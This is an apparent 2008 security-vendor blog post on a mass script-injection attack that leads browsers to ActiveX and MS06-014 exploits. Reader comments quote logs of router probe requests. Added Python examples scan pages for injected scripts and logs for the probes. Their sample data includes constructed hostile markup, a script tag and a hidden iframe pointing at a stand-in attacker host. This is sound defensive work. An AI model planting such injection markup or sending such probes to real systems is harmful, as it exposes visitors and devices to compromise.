
Another Mass Attack Underway

Wednesday, March 12, 2008 at 4:35pm by Craig Schmugar

On the heels of recent iframe attacks, we’re currently tracking another mass compromise. This attack involves injection of script into valid web pages to include a reference to a malicious .JS file (sometimes in the BODY, other times in the TITLE section). The .JS file uses script to write an IFRAME, which loads an HTML file that attempts to exploit several vulnerabilities, including:

  • MS06-014
  • RealPlayer (ActiveX Control)
  • Baofeng Storm (ActiveX Control)
  • Xunlei Thunder DapPlayer (ActiveX Control)
  • Ourgame GLWorld GlobalLink Chat (ActiveX Control)

This is one of those cascading threats, where one page leads to another and another, which leads to an executable, which leads to another and another. At least one of the payload trojans targets online gamers.

Preliminary research results suggest more than 10,000 pages were affected by this hack attack.

Similar attacks have been observed in the past; most notably, the infamous “Dolphin Stadium” (aka Super Bowl) attack was similar, and was later connected with SQL injection as the method the attackers used to inject their malicious code. In cases where the TITLE tag has been modified, the browser’s title bar will show the script reference:

[Image: Example of browser title bar (censored)]
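As an added example (not code from the original post), a small scanner for the two tells described above: a script reference sitting inside the TITLE element, and an off-site script reference in the BODY, plus a check for a loader .JS that writes an IFRAME via document.write. The sample page, the host evil.example and the trusted-host set are constructed placeholders.

```python
import re
from html.parser import HTMLParser

# Constructed sample page: an injected reference to a hypothetical .JS file appears
# both inside TITLE and in BODY (evil.example is a placeholder host, not a real IoC).
SAMPLE_PAGE = """<html><head>
<title>Welcome<script src="http://evil.example/x.js"></script></title>
</head><body><p>Hello</p>
<script src="/js/site.js"></script>
<script src="http://evil.example/x.js"></script>
</body></html>"""
# Constructed stand-in for the loader .JS: it writes a zero-size IFRAME.
SAMPLE_JS = 'document.write("<iframe src=\\"http://evil.example/e.htm\\" width=0 height=0></iframe>");'

class ScriptRefFinder(HTMLParser):
    """Collect external script references and whether each sits inside TITLE."""
    def __init__(self):
        super().__init__()
        self.in_title = False
        self.refs = []  # (src, "title" | "body")
    def handle_starttag(self, tag, attrs):
        if tag == "title":
            self.in_title = True
        elif tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.refs.append((src, "title" if self.in_title else "body"))
    def handle_endtag(self, tag):
        if tag == "title":
            self.in_title = False

def find_script_refs(html):
    parser = ScriptRefFinder()
    parser.feed(html)
    return parser.refs

def suspicious_refs(html, trusted_hosts):
    """Flag any script inside TITLE, and any external script not on a trusted host."""
    flagged = []
    for src, loc in find_script_refs(html):
        m = re.match(r"https?://([^/]+)", src, re.I)
        host = m.group(1).lower() if m else None  # None = same-site relative path
        if loc == "title" or (host is not None and host not in trusted_hosts):
            flagged.append((src, loc))
    return flagged

IFRAME_WRITE = re.compile(r"document\.write\s*\(.*<iframe", re.I | re.S)

def writes_iframe(js):
    """True when a script writes an IFRAME via document.write, the loader pattern above."""
    return bool(IFRAME_WRITE.search(js))
```

A same-site relative script path is never flagged on its own, so a site's legitimate scripts pass while an injected off-site reference or anything inside TITLE is reported.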

McAfee’s designations for the various pieces of malware include:

  • Downloader-BGX
  • Exploit-RealPlay
  • JS/Exploit-BO.gen
  • VBS/Psyme

Analysis is ongoing.


Comments (10)

  • Maeven March 19, 2008 12:08PM

    So, how can an ordinary user recognize if their computer is infected with this virus/trojan? Is there a file name we should be looking for in the Task Manager or elsewhere?

  • Aa'ed Alqarta March 18, 2008 12:47PM

    System admins should be ready to prevent their clients from getting exploited and redirected to those malicious domains.

    check here: http://extremesecurity.blogspot.com/2008/03/iframe-attacks-actions-to-be-taken.html

  • Craig Schmugar March 18, 2008 8:52AM

    Blind SQL injection was used to attack ASP applications. The vulnerability is in the coding of the applications and improper sanitization of input parameters.

    More details are available here:
    http://blogs.technet.com/neilcar/archive/2008/03/15/anatomy-of-a-sql-injection-incident-part-2-meat.aspx

  • eric March 17, 2008 9:06PM

    So is it a common web server software that is being hacked, Apache, IIS, what have you?

  • Jan de Kruyf March 15, 2008 3:17AM

    # Bas Groot Says:
    March 14th, 2008 at 12:19 am

    How did they break into the website? If it is automated, it must be a widely spread exploit that is worth reporting.
    —————————————————————-

    It is automated, it comes from Europe, Holland and France the last time I checked, and it is indeed aimed at certain routers. There was a general discussion about 3 years back on the net.
    From my analysis, they request a specific file on this router, “/cgi-bin/firmwarecfg”; if they are the first running it, then it leaves the whole system wide open since they have access to all info in the router, or something like that. In any case, complaints to my provider or the provider from whose network some of the attacks originate have not been answered whatsoever.

    Peace

    Jan de Kruyf.

  • Craig Schmugar March 14, 2008 11:25AM

    There’s not much to see…the drive by can cause IE to hang, and the payload doesn’t display anything.

  • curious March 14, 2008 10:28AM

    Could McAfee show us a video demo of this attack in action, similar to the video for the phpBB hack?

    Thanks.

  • Toralv Dirro March 14, 2008 4:28AM

    That is an attempt to exploit a 3 year old vulnerability found in some DSL routers if remote management is enabled and is very likely not related to the Mass Hack Attacks.

    cheers,
    Toralv

  • Bas Groot March 14, 2008 12:19AM

    How did they break into the website? If it is automated, it must be a widely spread exploit that is worth reporting.

  • Jan de Kruyf March 13, 2008 12:09PM

    hello,
    I do not know if this is related or known: every few days there is an attack on my website which does not succeed since a PC in general is not vulnerable, but certain routers are.
    Here is an excerpt from my access log:
    ——————————————————————
    41.232.21.69 - - [07/Mar/2008:13:44:58 +0200] "POST /cgi-bin/firmwarecfg HTTP/1.1" 400 431 "-" "veryprivateacsor"
    41.234.44.208 - - [07/Mar/2008:22:03:53 +0200] "POST /cgi-bin/firmwarecfg HTTP/1.1" 400 431 "-" "veryprivateacsor"
    41.234.15.165 - - [07/Mar/2008:22:03:54 +0200] "POST /cgi-bin/firmwarecfg HTTP/1.1" 400 431 "-" "veryprivateacsor"
    ——————————————————————-

    Here is the corresponding error log:
    ——————————————————————-
    [Fri Mar 07 13:44:58 2008] [error] [client 41.232.21.69] request failed: error reading the headers
    [Fri Mar 07 22:03:53 2008] [error] [client 41.234.44.208] request failed: error reading the headers
    [Fri Mar 07 22:03:54 2008] [error] [client 41.234.15.165] request failed: error reading the headers
    ——————————————————————-

    Complaint to the service provider had no result!!

    peace,

    Jan de Kruyf.
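As an added example (not part of the comment thread), a defender-side check over log lines like the ones Jan posted: parse the Apache access and error logs, pick out POST requests to /cgi-bin/firmwarecfg, and join each hit to the error-log entry recorded for the same client in the same second. The log lines are constructed with documentation-range addresses; the path and user-agent string are the ones quoted in the comment.

```python
import re
from datetime import datetime

# Constructed sample lines modelled on the comment above: Apache combined access log
# and the matching error log. Addresses are from the RFC 5737 documentation range,
# not real clients; the request path and user-agent are as quoted in the comment.
ACCESS_LOG = """\
192.0.2.10 - - [07/Mar/2008:13:44:58 +0200] "POST /cgi-bin/firmwarecfg HTTP/1.1" 400 431 "-" "veryprivateacsor"
192.0.2.20 - - [07/Mar/2008:14:01:10 +0200] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.30 - - [07/Mar/2008:22:03:53 +0200] "POST /cgi-bin/firmwarecfg HTTP/1.1" 400 431 "-" "veryprivateacsor"
"""
ERROR_LOG = """\
[Fri Mar 07 13:44:58 2008] [error] [client 192.0.2.10] request failed: error reading the headers
[Fri Mar 07 22:03:53 2008] [error] [client 192.0.2.30] request failed: error reading the headers
"""

ACCESS_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')
ERROR_RE = re.compile(r'^\[(?P<ts>[^\]]+)\] \[error\] \[client (?P<ip>[^\]]+)\] (?P<msg>.*)$')
PROBE_PATH = "/cgi-bin/firmwarecfg"  # router remote-management CGI named in the comment

def parse_access(text):
    rows = []
    for line in text.splitlines():
        m = ACCESS_RE.match(line)
        if m:
            # drop the "+0200" zone so both logs compare as local wall-clock time
            ts = datetime.strptime(m["ts"].split(" ")[0], "%d/%b/%Y:%H:%M:%S")
            rows.append({"ip": m["ip"], "ts": ts, "method": m["method"], "path": m["path"], "status": int(m["status"])})
    return rows

def parse_error(text):
    rows = []
    for line in text.splitlines():
        m = ERROR_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y")
            rows.append({"ip": m["ip"], "ts": ts, "msg": m["msg"]})
    return rows

def firmwarecfg_probes(access_text, error_text):
    """Return probe hits, each joined to the error-log message for the same client in the same second."""
    errors = {(e["ip"], e["ts"]): e["msg"] for e in parse_error(error_text)}
    hits = []
    for r in parse_access(access_text):
        if r["method"] == "POST" and r["path"] == PROBE_PATH:
            hits.append({**r, "error": errors.get((r["ip"], r["ts"]))})
    return hits
```

A 400 status with "error reading the headers" on every hit is consistent with Toralv's reading above: the client is speaking a router's management protocol at a web server that does not understand it, so the request fails before any handler runs.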